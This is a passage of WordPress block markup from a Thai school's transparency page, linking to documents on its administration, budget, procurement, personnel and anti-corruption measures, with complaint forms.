{\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 